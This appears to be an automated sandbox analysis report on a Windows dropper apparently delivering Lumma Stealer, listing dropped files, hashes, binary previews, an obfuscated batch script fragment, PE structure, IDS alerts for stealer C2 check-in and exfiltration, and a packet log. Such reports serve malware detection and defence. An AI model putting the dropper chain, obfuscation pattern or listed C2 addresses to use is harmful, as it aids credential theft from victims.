SHA1:	87D5486B7EFD98DCC92B4393D20D39D12CB6487E
SHA-256:	EDD50131DA69EA2747D0BCA3ECD4293778BEB5491FBF02BF6D4ADA4B2E9F01C1
SHA-512:	D1C7AAD1E7F376C7622031D36A3C1F2452B693E5FA976B35CFC22045180388B55218FA8C2B0270C2F66C996B805112C6D82F312642809D9051F350AE1220A85E
Malicious:	false
Preview:	..t!@xF.....U...-p.....)..1^....Y.....w...z..(.....b.$\X..2..#.....6c..@...\.E$R.u....Z.]..<`..v...9.a.W..N?=...6..d._......9.~.5~.....Jd...~0h'.............bf.6....Q.I........J.U.d......I...\.'J..m..).n.,S.../................$.j.....,L.-....`s2..2...V........U.6.\./U~...y...K..2.i.z...l.k.EQ..+.=.....E]T.\Y.?.C..'.m...hP.'.M..mc....:}.e6-^.g..$...o.k.b]!@...Vl.,.e.O.....9S.?..MA......\|...U?].....D..f....D=....za.Nf......46.I......>..../T(6...L..B..Y.8.3B..J.[S..@........%..^..e$.ck......b.h.....Y.$:.K_p}c.;i..C.}..O.D \|.&...f\|n.......yq....#\|..B..T..F....t..R~)d)<.N.0......tp.9..~Co.....W.n.(1.).y...%_.......Y....D(..b....>..)^....dGX..iA.9...n.H8...pn...D...\.......a5.t\<1.N..=.......v..e.q.M.W..]....a.-7~*BO.k..j...\|3.}_2jz.A3.X.-3(.fN\.4.>J......yG...om......f....v..uCP...+g...i.IU{R..Be8.....o5...=...k.n`(..m..w..S.9.@..l.ri...U?..ctD+...+S...u.e;..G.G.=3S,.S.......q....M.U/z.>..y..k....e..J&4$.z.....[B..J.Ax0..!]fr....M..Ry

C:\Users\user\AppData\Local\Temp\Receiver

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	5.844749716437728
Encrypted:	false
SSDEEP:	1536:xj62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwug:xjfTq8QLeAg0Fuz08XvBNbjaAtg
MD5:	7A1D29A789B8F5CA0F4186AA1DBC3BC2
SHA1:	A9A3169FF90FA2BFFB8D96F95FFDB3A70386B476
SHA-256:	A513073A8C2E7F41CF78374498C2D980CD8DA473246AF5475C53C1D7FA7BA0DE
SHA-512:	AD90D9521F68AFFDA3AD4CCA4ECF1A72C3CFCB465F3D60FB8BCB02FFACD3ABD9F1DBF03C022F13FC68DA74080355CE36C0B13D4E511E0857AF60C30B2032D3A0
Malicious:	false
Preview:	..F.. r.^].U..QS.].V.u..U..C.W....Cx.<H....b....}....0....{P.........w.E.;........C\|......E.;...(.....2.....%....=....u....#....#....................%....=....u....#....#.....................L..............M.,K.;.t-.....K...;.t ......K....@.K...;..........;.u......E.;}...F...+U......u..~.+.N;S\|sa........E.=....w..C<.]......]..].......w..C<....9M.u1.........~..[\|N;.s.............f;.u......j.X....._^[..U..QQSV.u...M.W..xQ;u.}L.D..+..E....E....P.......Y..u.j..+...E..u...HQW.R...E....3.f..8.M..E..9..j.X_^[..U....SVW....3.B.....#.M.......sQ.......u%f..u....L.............j..T>.X....3...f..t...........T8.t..E.........j.Y..".t... ...f...........E......}..E......U.3.E.B.......f;.u<....}..t&%....=....u.........#.#..............;...........j.Xf;..........}..tZ..%....j.[=....u.........#.#....................%....=....u"............%....................;.r.;...r...3.B...j.Yf....'....E._^[..E......L.....E....E.,K..E.3.f;].....E..E.....2....$...I.j.Xf;..........K.<.......<....

C:\Users\user\AppData\Local\Temp\Reflect

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	Microsoft Cabinet archive data, 488808 bytes, 9 files, at 0x2c +A "Cooked" +A "Receiver", ID 6076, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488808
Entropy (8bit):	7.998475465922649
Encrypted:	true
SSDEEP:	12288:ohQLaKCeh787wflZffn5DMrTn1GF1MwTYcOkxFdryB:PaenflZ1iT1CMaLLxFde
MD5:	97942C5C8DFF98863EFC71FC15CE0257
SHA1:	14D6BA8E5C3B7BE1BE540CA7ECAA075D5C505E3B
SHA-256:	B4A2CBEAA8185681ED75BDF2C34020CCAA9405A42A47C4C3D17EC6E907FD9152
SHA-512:	7D1FABB306D3CD38985CE6472DF17973AEE7F4D56902D48A1CF690BBAF8D5BA71D83DD79136FCA635AB51813FC3978E9871DECAD0E07D46BEE5A998E5CB77D6F
Malicious:	false
Preview:	MSCF....hu......,......................................Y<. .Cooked..X.........Y<. .Receiver..(...@.....Y<. .Attractions.Q....h.....Y<. .Fingers..D..Q;.....Y<. .User.....Q......Y<. .Pot.....Q......Y<. .Alt.....Q......Y<. .Articles..T..] .....Y<. .Specialty./.s6.R..CK...xT..0\|f.$9$.3.."..:Z...pI.. L.Bp..........s.h.BO.9lF..V..Z..V........./.D..$"mw<Q.b2.....$...?...}Y{..../..;0R.......G...H....E.........r..wX..A)$KZ.........f..<../....Z.............ul....Z+..i)={.'.....PW..6OO5<..s.(....k.c...N.s.Z.g.."E..KH....k....%:6A;Cj...^.O..P.m.8._.3b.......?...Z..T..V.O...I....kEA.E&.\|..}...."...7...0."....Ep(...`8....Y;t+..y...&K ]RS.h.4...0AP.<Z..J..V.Pwmx.FE...,.uJm./.......k ...V....B....!u..ix.a.H.;.......gGM......bs..D..7....Q.....Id.S..4.{....*.(7..:.ym....wB)z..^C....15%\|.Ru.....\.[8.....'@9j~..E...p&.]..)0...Lzz%..m....w..Z8.Og...d.....%.B.D...t..~$6.... .C..Qs..z..............h..=..)....4H+`.v"5W.....h.....X..>O...}5m.lj......&..U?.1.....WN...,tC.IN.6+....

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\ZTM2pfyhu3.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Specialty

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	152576
Entropy (8bit):	6.433958275406592
Encrypted:	false
SSDEEP:	3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:UK5vPeDkjGgQaE/loUDtf0aD
MD5:	D49F624EA007E69AFE1163955DDBA1BB
SHA1:	EE35A9CEAB1F6A40694B26094FDC7727658293D2
SHA-256:	4052653CEDFD2F560DA3BEE9825F88F60DBD053ABB3C064F3D19D98863B2962C
SHA-512:	63B1629E79C35E59923D4A1C12B93FEB45241EB0D2B59A03B9EB14BF76DAA82BA124710E8F4AA157D0C63BADFDCFFD916F049B85DE4B52CAA143F0DD32AD71E8
Malicious:	false
Preview:	hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..

C:\Users\user\AppData\Local\Temp\Symposium

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	ASCII text, with very long lines (1070), with CRLF line terminators
Category:	dropped
Size (bytes):	25405
Entropy (8bit):	5.118149909201556
Encrypted:	false
SSDEEP:	384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
MD5:	23812A6E32E38911133B221F39F9A20B
SHA1:	5B3B155889AB3A04ABDD1F195753E817ED3FDB23
SHA-256:	D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
SHA-512:	02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
Malicious:	false
Preview:	Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame

C:\Users\user\AppData\Local\Temp\Symposium.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1070), with CRLF line terminators
Category:	dropped
Size (bytes):	25405
Entropy (8bit):	5.118149909201556
Encrypted:	false
SSDEEP:	384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
MD5:	23812A6E32E38911133B221F39F9A20B
SHA1:	5B3B155889AB3A04ABDD1F195753E817ED3FDB23
SHA-256:	D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
SHA-512:	02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
Malicious:	false
Preview:	Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame

C:\Users\user\AppData\Local\Temp\User

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	148480
Entropy (8bit):	6.695251861322664
Encrypted:	false
SSDEEP:	3072:4cBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCh:4cB3gBmmLsiS+SAhClbfSCh
MD5:	A1E25E38AD59F032B7717CC6E5E00609
SHA1:	F7E7D770656E25F73BE807AC53F49776810099D5
SHA-256:	A39C8CC684FC60938C2F6CF62640F4B67F8C29A1EE75D172735B8384F8D79E8A
SHA-512:	4DDCF310A6FB0E21717A14EBD47C78043B792837F21BD13392B06D08C9D4CB974407218ECFAC94D03E23DEFFE2B6B613FB408EFB1A621913AF4D97A2424D4AEA
Malicious:	false
Preview:	f;...J....f...f;........B.f;...0....Pvf;........B.f;........Pvf;........B.f;........P...f;........B.f;........Pvf;.rw.B.f;.........Pf;.rc..Pf;........@...f;.rM.B.f;............f;.r7.B.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.v.j..F.Zf;.v......t"..uWj.[.]..Oj.Z.F.f;....w... ..........M...xt...Xt...u.j.[.].P.M..A.......u.j.[.]...1..M.....E.QPj.j..M..:....M..].3.E..M.j0Xf;.......j:Zf;.s....+..........f;...k....`...f;...s....P.f;.r.....f;...]....P.f;.r..f...f;...G....P.f;.r..Bvf;...3....P.f;.r..Bvf;........P.f;...z....Bvf;........P.f;...b....Bvf;........P.f;...J....f...f;........P.f;...0....Bvf;........P.f;........Bvf;........P.f;........P...f;........P.f;........Bvf;.rw.P.f;.........Pf;.rc..Pf;........@...f;.rM.P.f;............f;.r7.P.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.vUj..F.Zf;.vM............;}.s~.U..E...;..U..M.r<.u.w.;.r3;.u.;E.u.;].r%w.;}.v.....U..1j.Z.F....f;.w... ....PQ.u..u...........M...E.E..M...0....E.....V.

C:\Users\user\AppData\Local\Temp\Zone

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.997576222410487
Encrypted:	true
SSDEEP:	1536:eLQfqgBMCPA1XlKvwsSow5tLh2bBK3M1wY6FCUN8Pn+9BlGRpjyBGHS:1ICPA11KIjP5tLsbBKM176F7NVARcBGy
MD5:	6ECD89B15DFAEE100B13F894C76F9CEE
SHA1:	CFF0D1262CAD22201D25B331AFD9EB882865767F
SHA-256:	73D440F3C827B1B041209B7C9F2FD26D3BD6A5CDA3713B86BA965BF45AA46325
SHA-512:	6452A2A3DE1EC01DDA09ADF53C92A63C6AC830B3DC61CF305C08BAF5BD8FEB14EE67BD1B2BF7B8B61A46E8D3E9B23FB4097CB4565092840F6811084C98CEBC74
Malicious:	false
Preview:	/..GG..z..>.p(.....!}..h..}..O.;....."}$48...Bk.a-,n."..n.1&.. ..........c....<i`p...'.....E3.&..Q.y......oX.W:.u.....`.....?.l..uFWV..(H.u.......H.....(%8...x,...h.i..w.y...#...\.`V'v.2..F1S+4.c.3..j.Z.r.d.b.6.h....=....yH.:.....a..m...)a...w;.=4...\i....p.'.p.$.?x....T...!G<.W4......Q.qG..B05.t..tP.E....r.S.Gx.........1~...%.6..I........4..T7...$u:...4.WC^.2v..t....E.....%....t].D....4$.U...&.h. Im..Y"{,...\|...?[9[..";6....~.$2P...Fb.....UZ^9&.....!..}."<.y...?....\|..Y........$......>.V.Be....l^.&.h%Z.f..6........3.n.Sg......MU.^&..A..=.b.......e"..5p...i..r.$.R.%.f..8.2`.C."r._..9.6-.b.y.y5n...L.W...?$......r..>.....A...q.....Q...E.c..[.Qho..C..G.....:.K.NT.mQ..$.s..y...F...=..\....Y=.r.U....P..0..._u.....ib...r.....V.(.)..R....1..k.h..[0....1r4.......T\p..<...n..;4\D+......u\|7.s2>..60...n.,... ...X..1=...N.6.pC....@l.....p...<(....../..G.t4....7wp+...r.J%...0.N....g....]..\|..n.......o.Lx..q.S...B.5],.M.H.P...@B...g.js.N.fY..9..{..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9788202310345175
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ZTM2pfyhu3.exe
File size:	7'085'568 bytes
MD5:	d08440343dcfebe534564ab0084f5f65
SHA1:	ba168d05813a55e987178c07c1d03c24e4fe1b4e
SHA256:	794ae0a21b8b6845efc55b6afb6b8588452e12b426abf29d2d52ed66db0b175a
SHA512:	642aaf382b8fb2d106dd02046a2671117307db1d8a2e33bf0ce5880531bc84b387e25711d3e75acc23e0e40d89cd8a20c9ff6a7d4f7c15ac35fa811aae4cccd1
SSDEEP:	196608:pCU1K/DuBl20Dt6piHFQZn5URuKXqDVh2DTSq:pCLDOlkpYiZn5ULX+KTSq
TLSH:	A26633D99420F4BFF049CD7766A343A7B867471609EEDFBA463A2094C731AB01F1193A
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.ng..................x.......... ... ... y...@.. .......................`........l...@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xfe2000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676E9445 [Fri Dec 27 11:49:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F88FD0FCB3Ah
paddb mm5, qword ptr [ebx+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F88FD0FEB35h
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x794055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x792000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7941f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x790000	0x518a00	483a1659cc3b2dd70ab985c5f8f39035	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x792000	0x53c	0x400	c6d3b2e3bd09efcff17f15c56dde3ba5	False	0.6884765625	data	5.639433430894464	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x794000	0x2000	0x200	a0232179652c49de360269397bdb9eca	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x796000	0x2a4000	0x200	b7540b9fcfb00e6362a279a4bbac0708	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jbuwepie	0xa3a000	0x1a6000	0x1a4400	239e41673e34c8e0b7dcaf20542c71be	False	0.9945153322055325	data	7.9527060422292335	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uwwakvzu	0xbe0000	0x2000	0x600	b7b3678cb88336d0f387b9b564cb6e2d	False	0.6119791666666666	data	5.255515959899759	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xbe2000	0x4000	0x2200	5d7f821907c7004949713302267e5849	False	0.07686121323529412	DOS executable (COM)	1.0209899379237815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbddf3c	0x244	data			0.4689655172413793
RT_MANIFEST	0xbde180	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T14:51:30.463675+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49728	104.21.2.51	443	TCP
2024-12-27T14:51:31.199170+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49728	104.21.2.51	443	TCP
2024-12-27T14:51:31.199170+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49728	104.21.2.51	443	TCP
2024-12-27T14:51:32.505420+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49735	104.21.2.51	443	TCP
2024-12-27T14:51:33.292217+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49735	104.21.2.51	443	TCP
2024-12-27T14:51:33.292217+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49735	104.21.2.51	443	TCP
2024-12-27T14:51:34.936347+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49741	104.21.2.51	443	TCP
2024-12-27T14:51:36.255733+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49741	104.21.2.51	443	TCP
2024-12-27T14:51:37.859235+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49747	104.21.2.51	443	TCP
2024-12-27T14:51:40.170379+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49753	104.21.2.51	443	TCP
2024-12-27T14:51:43.085517+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49760	104.21.2.51	443	TCP
2024-12-27T14:51:45.687411+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49767	104.21.2.51	443	TCP
2024-12-27T14:51:45.691069+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49767	104.21.2.51	443	TCP
2024-12-27T14:51:48.844703+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49775	104.21.2.51	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 14:51:07.949599028 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:07.949659109 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:07.949733973 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:07.952270985 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:07.952285051 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:09.753597975 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:09.754062891 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:09.754101038 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:09.755424976 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:09.755588055 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:09.756865025 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:09.756928921 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:09.765532017 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:09.765538931 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:09.975337982 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:09.976011992 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:10.094624043 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:10.094688892 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:10.094850063 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:10.095699072 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 14:51:10.095721006 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 14:51:22.534509897 CET	49713	80	192.168.2.5	185.121.15.192
Dec 27, 2024 14:51:22.654081106 CET	80	49713	185.121.15.192	192.168.2.5
Dec 27, 2024 14:51:22.654268980 CET	49713	80	192.168.2.5	185.121.15.192
Dec 27, 2024 14:51:22.655287027 CET	49713	80	192.168.2.5	185.121.15.192
Dec 27, 2024 14:51:22.774897099 CET	80	49713	185.121.15.192	192.168.2.5
Dec 27, 2024 14:51:22.774945974 CET	80	49713	185.121.15.192	192.168.2.5
Dec 27, 2024 14:51:22.774995089 CET	80	49713	185.121.15.192	192.168.2.5
Dec 27, 2024 14:51:22.775003910 CET	80	49713	185.121.15.192	192.168.2.5
Dec 27, 2024 14:51:22.775046110 CET	49713	80	192.168.2.5	185.121.15.192
Dec 27, 2024 14:51:22.775125027 CET	80	49713	185.121.15.192	192.168.2.5
Dec 27, 2024 14:51:22.775135040 CET	80	49713	185.121.15.192	192.168.2.5
